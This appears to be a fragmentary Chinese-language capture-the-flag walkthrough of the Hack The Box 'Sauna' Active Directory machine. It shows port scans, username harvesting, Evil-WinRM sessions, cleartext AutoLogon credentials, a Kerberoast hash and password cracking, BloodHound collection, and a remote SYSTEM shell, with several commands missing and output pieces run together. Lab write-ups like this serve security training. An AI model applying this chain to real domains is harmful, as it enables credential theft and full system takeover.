┌──(kali㉿offsec)-[~/Desktop] └─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.175 [sudo] kali 的密码: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-10 00:09 CST Nmap scan report for10.10.10.175 Host is up (0.14s latency). Not shown: 65515 filtered tcp ports (no-response) PORT STATE SERVICE 53/tcp open domain 80/tcp open http 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5985/tcp open wsman 9389/tcp open adws 49667/tcp open unknown 49675/tcp open unknown 49676/tcp open unknown 49677/tcp open unknown 49749/tcp open unknown 49772/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 20.68 seconds
┌──(kali㉿offsec)-[~/Desktop] └─$ sudo nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49675,49676,49677,49749,49772 -sC -sV --min-rate=1000010.10.10.175 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-10 00:13 CST Nmap scan report for10.10.10.175 Host is up (0.13s latency).
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: Egotistical Bank :: Home |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-05-0915:09:44Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49676/tcp open msrpc Microsoft Windows RPC 49677/tcp open msrpc Microsoft Windows RPC 49749/tcp open msrpc Microsoft Windows RPC 49772/tcp open msrpc Microsoft Windows RPC Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 103.46 seconds
3、先看下80端口的情况吧
http://10.10.10.175/
http://10.10.10.175/single.html
1 2 3 4
Jenny Joy James Doe Johnson Watson
http://10.10.10.175/about.html
1 2 3 4 5 6
Fergus Smith Hugo Bear Steven Kerb Shaun Coins Bowie Taylor Sophie Driver
http://10.10.10.175/contact.html
4、通过网上面,我们发现了一些用户名,先留着后续使用,我们先绑定下本地hosts信息
1 2 3 4
┌──(kali㉿offsec)-[~/Desktop] └─$ echo "10.10.10.175 EGOTISTICAL-BANK.LOCAL" | sudo tee -a /etc/hosts [sudo] kali 的密码: 10.10.10.175 EGOTISTICAL-BANK.LOCAL
ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits.
* Append -O to the commandline. This lowers the maximum supported password/salt length(usually down to 32).
* Append -w 3 to the commandline. This can cause your screen to lag.
* Append -S to the commandline. This has a drastic speed impact but can be better for specific attacks. Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way: https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power: https://hashcat.net/faq/morework
Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled *Evil-WinRM* PS C:\Users\FSmith\Desktop> net user fsmith User name FSmith Full Name Fergus Smith Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never
Password last set1/23/20209:45:19 AM Password expires Never Password changeable 1/24/20209:45:19 AM Password required Yes User may change password Yes
Workstations allowed All Logon script User profile Home directory Last logon 5/9/20241:28:24 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use Global Group memberships *Domain Users The command completed successfully.
*Evil-WinRM* PS C:\Users\FSmith\Desktop> net localgroup
*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user /domain
User accounts for \\
------------------------------------------------------------------------------- Administrator FSmith Guest HSmith krbtgt svc_loanmgr The command completed with one or more errors.
Computer Name : SAUNA User Name : HSmith User Id : 1103 Is Enabled : True User Type : User Comment : Last Logon : 1/1/197012:00:00 AM Logons Count : 0 Password Last Set : 1/22/202010:54:34 PM
Computer Name : SAUNA User Name : svc_loanmgr User Id : 1108 Is Enabled : True User Type : User Comment : Last Logon : 1/1/197012:00:00 AM Logons Count : 0 Password Last Set : 1/24/20204:48:31 PM
Looking for AutoLogon credentials Some AutoLogon credentials were found DefaultDomainName : EGOTISTICALBANK DefaultUserName : EGOTISTICALBANK\svc_loanmanager DefaultPassword : Moneymakestheworldgoround!
*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user svc_loanmgr User name svc_loanmgr Full Name L Manager Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never
Password last set1/24/20204:48:31 PM Password expires Never Password changeable 1/25/20204:48:31 PM Password required Yes User may change password Yes
Workstations allowed All Logon script User profile Home directory Last logon Never
Logon hours allowed All
Local Group Memberships *Remote Management Use Global Group memberships *Domain Users The command completed successfully.
*Evil-WinRM* PS C:\Users\FSmith\Desktop>
*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user HSmith User name HSmith Full Name Hugo Smith Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never
Password last set1/22/202010:54:34 PM Password expires Never Password changeable 1/23/202010:54:34 PM Password required Yes User may change password Yes
Workstations allowed All Logon script User profile Home directory Last logon Never
Logon hours allowed All
Local Group Memberships Global Group memberships *Domain Users The command completed successfully.
[-] CCache file is not found. Skipping... $krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$egotistical-bank.local/HSmith*$cf98868809279887e2ad034a9d23cd4a$85212b1895397574cc5445dd617a63a0ff4746693d7718c141984a066830446ac0423b55e7074031db7984f0621a9eefe2c9ebfaac73c83bd9122f9b360e7a45e975453f9711b33c550185e94d18c4def816a5db45bb792f53d7c58e6b3fbf23c3072dc48bbcbb993195ce7fe0ca4825283e9c41c37e9bae8f961efa0b1d1ebd82403c017d0a67276094e475bc781ca8f088220c5b1e870cc72a1db25bc991fb2d241814008dff1d7e712b460c58eed1da4f82d58aa8bdecc99ce8456e2b7c67847c8a27437422ba2e2e433ace4f82b15f26c864a2537c54f97ac971973a1b59fe32dfbbd0438adcf437c733544be850e46fceea9e93f6d31c19ac8292cb78f24684d5581d02735f76663c4e335d92d1ea9aa8e9b47678d287561c49f38dc8fcd335b98782dec427e61acebed5b9d5ef674d980ca48b7da0f69fadcf50c34ebb999c5f1b8dddc4466adfb9f72b0ef986a7db20036cbff4c16a8658d2410bd6f351665a512feaa957edbce6ee70f8e6c2d6578e22ed5fb08d841c7d176ec0e0606ab807fd7e3335fc25c56a5601a951ca909fa6a4e2ec694b2900aabf87ab5ead17d6d830c2a0f38e79217e79db47e5862eee1e1c858c69ed7f49c1a2398b0df40baf22c844e609a59d1ec7faaffad2dabce0af00f7817628f7ce3e9f62bb3f5d5fe5a05be790a1b086c6988cedc8c79b43a77fc618a7c259c6458d2c790d587b2e4a80938c18fd4756d9f576c54ba97e5e95ff91eb0102ef48abc1bd1c7d13d5f2369619e27d613b9e2bfd2a70fa6fba2231b1b8987aaa35b465a5818be62d82ab4e6c3c7de24512b54e4390332c0354075e4f10b59f5ac905e4069a5004a67d731f5cf4214ae86ef0fa2967e144cd67e8e8370eb3cadf2a110fba65a725da0483c814f0ec2be895524038bf8bfb2fe53b22d7aa4599fd7d737ce4f079a0719ce8560db7e3b41d76e8eb7c854614248ee0ff893d47b8ef3f4d3f9a06e8c7673f3f6b55e047e4f15fda20c82e55916099d41a667622b91b62eb45527b377bc8ceabc806730a3f2e857b723b9080c0c1bd1662361e8b540a762eda10cadccc0db7c37cfc9845573afd30b13b9066c511f0263c051d211bec7e272ac7cf9790ca6e41b416df2db9bf55fcb37fbdfc1d8ea43b6445edae5b775dd95d9cfc3466e726830a0bf22e65e9d6c7348b70e1a2f0ea8d04c8f5587370900f0b2818fccda5892ea8bf8cd2efd5eaf382cff54cdc3b55ea0c68854c86d19e339b960d73cb7b512a8a6a10f5dbd2f0f07ac8bb12c7708fcce636ba26005b1ff50079f0c1774a71ae06f2dcb797f4410b3af65f401173ff0d1c96700fc00a2a3e2b35fb6012b961b051ef0cd23c8be6cc441bf54b635f3c9475e59ffd51c3fd17f8ea4c6b5ec5d671a8f3eea4
ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits.
* Append -O to the commandline. This lowers the maximum supported password/salt length(usually down to 32).
* Append -w 3 to the commandline. This can cause your screen to lag.
* Append -S to the commandline. This has a drastic speed impact but can be better for specific attacks. Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way: https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power: https://hashcat.net/faq/morework
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => Started: Fri May 1017:17:032024 Stopped: Fri May 1017:17:102024
┌──(kali㉿offsec)-[~/Desktop] └─$ bloodhound-python -u HSmith -p 'Thestrokes23' -d EGOTISTICAL-BANK.LOCAL -ns 10.10.10.175 -c all --zip INFO: Found AD domain: egotistical-bank.local INFO: Getting TGT for user WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error(SAUNA.EGOTISTICAL-BANK.LOCAL:88)] [Errno -2] Name or service not known INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL INFO: Found 7 users INFO: Found 52 groups INFO: Found 3 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL INFO: Done in 00M 21S INFO: Compressing output into 20240510175754_bloodhound.zip
[*] Requesting shares on EGOTISTICAL-BANK.LOCAL..... [*] Found writable share ADMIN$ [*] Uploading file qpMishEp.exe [*] Opening SVCManager on EGOTISTICAL-BANK.LOCAL..... [*] Creating service oCjR on EGOTISTICAL-BANK.LOCAL..... [*] Starting service oCjR..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.973] (c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami nt authority\system
C:\Windows\system32>
23、读取下最终的flag信息
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
C:\Windows\system32> cd C:/Users/Administrator/Desktop
C:\Users\Administrator\Desktop> dir Volume in drive C has no label. Volume Serial Number is 489C-D8FC